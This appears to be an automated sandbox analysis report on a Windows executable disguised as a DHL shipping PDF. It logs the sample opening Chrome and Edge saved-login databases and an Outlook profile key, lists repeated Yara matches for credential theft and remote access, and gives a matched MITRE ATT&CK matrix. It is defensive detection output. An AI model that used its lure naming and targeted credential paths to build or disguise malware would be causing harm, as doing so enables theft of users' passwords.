                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Queries volume information (VolumeInformation) for:
                    C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                    C:\Windows\Fonts\micross.ttf
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Yara match, file sources:
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack (type: UNPACKEDPE)
                    3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack (type: UNPACKEDPE)
                    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
                    00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716 (type: MEMORYSTR)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552 (type: MEMORYSTR)
                  Yara match, file sources:
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack (type: UNPACKEDPE)
                    3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack (type: UNPACKEDPE)
                    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716 (type: MEMORYSTR)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552 (type: MEMORYSTR)
                  Yara match, file sources:
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack (type: UNPACKEDPE)
                    3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack (type: UNPACKEDPE)
                    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716 (type: MEMORYSTR)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552 (type: MEMORYSTR)
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Yara match, file sources:
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack (type: UNPACKEDPE)
                    3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack (type: UNPACKEDPE)
                    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716 (type: MEMORYSTR)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552 (type: MEMORYSTR)

                  Remote Access Functionality

                  Yara match, file sources:
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack (type: UNPACKEDPE)
                    3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack (type: UNPACKEDPE)
                    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
                    00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716 (type: MEMORYSTR)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552 (type: MEMORYSTR)
                  Yara match, file sources:
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack (type: UNPACKEDPE)
                    3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack (type: UNPACKEDPE)
                    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716 (type: MEMORYSTR)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552 (type: MEMORYSTR)
                  Yara match, file sources:
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack (type: UNPACKEDPE)
                    3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack (type: UNPACKEDPE)
                    0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack (type: UNPACKEDPE)
                    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
                    00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716 (type: MEMORYSTR)
                    Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552 (type: MEMORYSTR)

                  MITRE ATT&CK Matrix, listed by tactic (a leading number marks a technique matched in this analysis):

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                  Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                  Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
                  Credential Access: 1 OS Credential Dumping; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                  Discovery: 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                  Collection: 1 Email Collection; 1 Input Capture; 11 Archive Collected Data; 1 Data from Local System; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                  Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement